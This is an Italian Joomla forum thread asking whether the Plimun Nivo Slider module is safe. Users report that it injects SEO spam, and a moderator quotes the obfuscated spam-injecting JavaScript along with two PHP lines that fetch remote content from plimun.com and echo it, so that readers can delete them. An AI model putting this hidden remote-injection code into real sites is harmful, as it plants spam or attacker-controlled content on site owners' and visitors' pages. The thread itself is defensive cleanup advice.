Back to top

Autore Topic: Plimun Nivo Slider e' sicuro?  (Letto 13580 volte)

Offline anna15

  • Esploratore
  • **
  • Post: 95
  • Sesso: Femmina
  • web & orti (non si sa mai!)
    • Mostra profilo
Plimun Nivo Slider e' sicuro?
« il: 12 Gen 2013, 10:57:04 »
Ciao A tutti
ho utilizzato in passato modulo Plimun Nivo Slider ma ho visto che la pagina su
http://extensions.joomla.org/extensions/photos-a-images/slideshow/image-jquery-slideshow/18640
e' stata rimossa
ci sono dei problemi di sicurezza?
e' meglio disistallarlo?
Grazie in anticipo per le indicazioni
Anna

Offline giovi

  • Instancabile
  • ******
  • Post: 9835
  • Sesso: Maschio
    • Mostra profilo
Re:Plimun Nivo Slider e' sicuro?
« Risposta #1 il: 12 Gen 2013, 11:05:37 »
molte altre numerose estensioni della stessa categoria utilizzano la stessa libreria jquery per implementare la slideshow. segui gli aggiornamenti (quella schermata serve a questo) e se riscontri che l'estensione è stata eliminata per quel motivo la sostituisci con un'alternativa equivalente. Altrimenti non c'è motivo di allarmarsi.. quando la finanza entra in un negozio a fare un controllo vuol dire necessariamente che il proprietario è un fuorilegge? :)

Offline anna15

  • Esploratore
  • **
  • Post: 95
  • Sesso: Femmina
  • web & orti (non si sa mai!)
    • Mostra profilo
Re:Plimun Nivo Slider e' sicuro?
« Risposta #2 il: 12 Gen 2013, 11:37:50 »
 Grazie per la sollecita risposta  :)
hai ragione...
Non ho molti strumenti per capire a fondo i problemi che possono sorgere ma l'anno scorso ho avuto un paio di sito violati (non per le gallery) e allora quando posso cerco conferme o ulteriori indicazioni.
Per il momento provo ad utilizzarne un'altra estensione ma andro a vedere piu' avanti se hanno ripristinato o risolto il problema.
grazie molte Anna

mau_develop

  • Visitatore
Re:Plimun Nivo Slider e' sicuro?
« Risposta #3 il: 12 Gen 2013, 14:45:56 »
perchè sembra che non ci sia più per joomla, se vai sul sito dello sviluppatore non ne trovo traccia

Offline vasco87

  • Nuovo arrivato
  • *
  • Post: 37
    • Mostra profilo
Re:Plimun Nivo Slider e' sicuro?
« Risposta #4 il: 16 Mar 2013, 20:01:53 »
non è affatto sicuro Plimun Nivo Slider, come anche Autson Slideshow... sono portatori del malware MW:SPAM:SEO.. infatti sono stati anche cancellati dalla jed...

Offline matty80

  • Global Moderator
  • Instancabile
  • ********
  • Post: 3974
  • Sesso: Maschio
    • Mostra profilo
Re:Plimun Nivo Slider e' sicuro?
« Risposta #5 il: 17 Mar 2013, 20:29:40 »
Ciao ragazzi, mi unisco alla discussione, ho appena rimosso anche io questo modulo.... non si sa mi prevenire e meglio che curare inoltre ci sono tanti moduli slideshow nella jed da far paura quindi....


cmq volevo segnalarvi la comparsa di questo modulo che secondo me poi è sempre lui! voi che dite?


P.S. C'era anche un articolo del buon Tonicopi negli articoli della comunità, che ne illustrava l'utilizzo ed in cui parlava di un link che portava a penalizzazioni in ambiente SEO.


hola
Chi non ha mai posseduto un cane, non sa cosa significhi essere amato. Arthur Schopenhauer

Offline BelinBelan

  • Instancabile
  • ******
  • Post: 3887
  • Sesso: Maschio
  • Niente di meno e niente di più. uguale? Forse.
    • Mostra profilo
Re:Plimun Nivo Slider e' sicuro?
« Risposta #6 il: 17 Mar 2013, 20:34:39 »
mi accodo perché dopo aver controlla nella JED e dopo aver letto questo topic... pure io ho cambiato slider...


ora uso vinaora cu3ber che mi fa le slide in 3d  ;)
--
Per piacere, no messaggi privati con richieste d'aiuto!!!

Offline giovi

  • Instancabile
  • ******
  • Post: 9835
  • Sesso: Maschio
    • Mostra profilo
Re:Plimun Nivo Slider e' sicuro?
« Risposta #7 il: 18 Mar 2013, 10:32:44 »
non è affatto sicuro Plimun Nivo Slider, come anche Autson Slideshow... sono portatori del malware MW:SPAM:SEO.. infatti sono stati anche cancellati dalla jed...
il problema è l'estensione per joomla! o la libreria nivo? uso nivo su una miriade di siti da molto tempo, tutti correttamente funzionanti e senza presenza di malware. non è che le estensioni si basavano su vecchie versioni non aggiornate o gli autori aggiungevano del codice malefico inconsapevolmente?
è importante sapere quale delle due sia il problema. se puoi posta un link delle fonti da cui hai appreso questa grave notizia

Offline vasco87

  • Nuovo arrivato
  • *
  • Post: 37
    • Mostra profilo
Re:Plimun Nivo Slider e' sicuro?
« Risposta #8 il: 05 Apr 2013, 16:57:52 »
Io usavo Plimun Nivo Slider aggiornato all'ultima versione! e  lo usavo in tutti i miei siti! infatti tutti infetti.. prova a fare uno scan dei tuoi siti con sucuri.net ...

Attenzione non parlo delle estensioni Unite Nivo Slider o Nivo Slider o altri... ma della versione "Plimun Nivo Slider"... Per tagliare la testa che il problema non fossi io ho domandato anche ad altri colleghi di fare lo scan.. risultato ? tutti infetti!

PS: Anche Autson Slideshow da questo problema...

Offline mmleoni

  • Global Moderator
  • Instancabile
  • ********
  • Post: 5547
  • Sesso: Maschio
  • Just another *nix coder/sysadmin...
    • Mostra profilo
Re:Plimun Nivo Slider e' sicuro?
« Risposta #9 il: 09 Apr 2013, 21:53:19 »
ciao a tutti.
 il problema è nella implementazione plimun che inserisce dei link di spam e non nel codice di nivoslider che è a posto.

mi sono trovato, all'interno di un sito su cui mi è stato chiesto di intervenire, un link, non gradito,  ad un sito di mutui:

Codice: [Seleziona]
<script language="JavaScript">
function nemoViewState()
{
var a=0,m,v,t,z,x=new Array('xxxx','xxxx','xxxx','xxxx'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}nemoViewState();
</script>
<p class="nemonn">By DLOLLOS <a hreX="http://www.xxxxx.co.uk/" title="Payday Loan">payday loans</a></p

ovviamente ho rimosso il codice di troppo;

quick fix:
in coda al file /modules/mod_PlimunNivoSlider/tmpl/default.php eliminate le righe:
Codice: [Seleziona]
$credit=file_get_contents('http://www.plimun.com/xing.php?i='.$path);
echo $credit;

dopo di che prendetevi il tempo per cercare un nuovo slider... sempre con nivo!!

ciao a tutti,
marco

mmleoni web consulting - creazione siti web aziendali ed e-commerce avanzati - sviluppo moduli e componenti Joomla

Offline tonicopi

  • Global Moderator
  • Instancabile
  • ********
  • Post: 12790
  • Sesso: Maschio
    • Mostra profilo
Re:Plimun Nivo Slider e' sicuro?
« Risposta #10 il: 09 Apr 2013, 23:46:26 »
Si, ne avevamo discusso ampiamente riguardo a questa mia recensione:
http://www.joomla.it/articoli-community-16-e-17-tab/5302-incredibile-slideshow.html
 Infatti la versione che si scarica da qui:
http://www.joomla.it/download-della-community/item/6018-plimunnivoslider.html
è stata ripulita dal link nascosto.
Per il resto non mi sembra che abbia particolari problemi, non più di altre estensioni, e non è segnalata come vulnerabile nella Vulnerable Extension List di joomla.org

joomlacsszengarden.com = il giardino dei css di Joomla!
L'attesa del piacere è essa stessa... piacere!

Offline marsetti

  • Nuovo arrivato
  • *
  • Post: 9
    • Mostra profilo
Re:Plimun Nivo Slider e' sicuro?
« Risposta #11 il: 18 Gen 2014, 11:52:26 »
Mi sono accorto che l'antivirus Avast blocca il sito con PlimunNivoSlider. Ritengo la cosa più semplice e facile sia cambiare il modulo.
Vittorino

Offline dlgiancarlo

  • Nuovo arrivato
  • *
  • Post: 14
    • Mostra profilo
Re:Plimun Nivo Slider e' sicuro?
« Risposta #12 il: 26 Giu 2014, 23:01:37 »
Intanto vi ringrazio per le risposte, la versione utilizzata nel sito e quella di Joomla 2.5.8 e siccome sono solo l'amministratore non so se posso fare l'aggiornamento di joomla tenendo tutto il contenuto del sito, ditemi voi cosa posso fare per migliore. per quanto riguarda plimun nivio se sapete di uno slider migliore sarei ben felice di provarlo grazie a tutti.

Offline matty80

  • Global Moderator
  • Instancabile
  • ********
  • Post: 3974
  • Sesso: Maschio
    • Mostra profilo
Re:Plimun Nivo Slider e' sicuro?
« Risposta #13 il: 26 Giu 2014, 23:46:28 »
Intanto vi ringrazio per le risposte, la versione utilizzata nel sito e quella di Joomla 2.5.8 e siccome sono solo l'amministratore non so se posso fare l'aggiornamento di joomla tenendo tutto il contenuto del sito, ditemi voi cosa posso fare per migliore. per quanto riguarda plimun nivio se sapete di uno slider migliore sarei ben felice di provarlo grazie a tutti.
ciao,
se hai i privilegi di amministratore SI puoi aggiornare all'ultima versione dei joomla la 2.5.23 e te lo raccomando.
Riguardo alla slideshow, la jed è piena e slideshowCK non è male... dagli un occhiata.


hola
Chi non ha mai posseduto un cane, non sa cosa significhi essere amato. Arthur Schopenhauer

 



Web Design Bolzano Kreatif